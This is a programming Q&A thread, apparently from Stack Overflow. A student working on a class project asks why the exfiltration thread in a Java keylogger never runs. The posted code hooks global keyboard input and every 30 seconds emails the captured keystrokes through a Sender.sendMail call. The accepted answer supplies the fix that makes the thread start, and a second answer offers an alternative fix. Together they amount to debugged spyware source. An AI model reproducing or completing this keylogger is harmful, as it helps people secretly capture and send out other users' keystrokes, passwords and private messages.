# Code block not running after execution of new thread

Tags: java

I'm trying to run some code I found on a tutorial from youtube for part of a class project. Basically I'm trying to show the effects of what happens when a keylogger is installed on your computer.

For some reason the run() is not being used in the ManageService class and I'm not sure why. I thought by adding the @Override and runnable at the top of the class would make this work.

Main class:

```
public class Main {
/**
 * gfgfterst
 * tests
 * sfdsf
 *
 */
    public static void main(String[] args) {
        ManageService service = new ManageService();
        try {
            GlobalScreen.registerNativeHook();
        } catch (Throwable e) {
            e.printStackTrace();
        }

        GlobalScreen.getInstance().addNativeKeyListener(service.getKeyBoard());
    }
}
```

ManageService class:

The run() function is not being used when the code is executed.

```
package handlers;

import keys.NativeKeyBoard;

public class ManageService implements Runnable {

    private NativeKeyBoard keyboard;
    private Thread service;

    public ManageService() {
        keyboard = new NativeKeyBoard();
        service = new Thread("Manage Service");
        service.start();
    }

    public NativeKeyBoard getKeyBoard() {
        return keyboard;
    }

    @Override
    public void run() {
        System.out.println("This isn't getting hit?");
        long start = System.nanoTime();
        while(true) {
            long elapsed = (System.nanoTime() - start) / 1_000_000;
            if(elapsed > 30_000 * 1) {
                try {
                    Sender.sendMail(Utils.prettyPrint(keyboard.getKeyCache()));
                    keyboard.onSend();
                } catch (Throwable e) {
                    System.out.println("keystroke data failed to be sentg.");
                    e.printStackTrace();
                    keyboard.onFail();
                }
                start = System.currentTimeMillis();
            }
        }
    }
}
```

Comment: Based on your code,you have not start the thread of `ManageService`

Comment: @lucumt Doesn't that get started in the constructor?

Comment: See my posted answer

Answer (score 2, accepted):

In your constructor code,you have not start the thread of `ManageService`,you can change your code as below:

```
public ManageService() {
    keyboard = new NativeKeyBoard();
    //make ManageService as an parameter to create a thread
    service = new Thread(this,"Manage Service");
    service.start();
}
```

Comment: I get this error: at handlers.ManageService.<init>(ManageService.java:14)

Comment: @Jakey Updated and test it again

Comment: @Jakey Glad to help you

Answer (score 0):

It's missing to call to start() method in order to run the thread of ManageService, please update these changes.

```
 public class ManageService extends Thread {
   ...
 }

 public static void main(String[] args) {
    ManageService service = new ManageService();
    service.start();
    try {
       GlobalScreen.registerNativeHook();
    } catch (Throwable e) {
       e.printStackTrace();
    }

    GlobalScreen.getInstance().addNativeKeyListener(service.getKeyBoard());
 }
```

Comment: I don't have a start method in my ManageService? Are you talking about the run method?

Comment: I updated it , you need to make those changes.. extends Thread or if you don't want ...  so you can create on main method, Thread thread = new Thread(service);  after that thread.start();   so it is the same idea.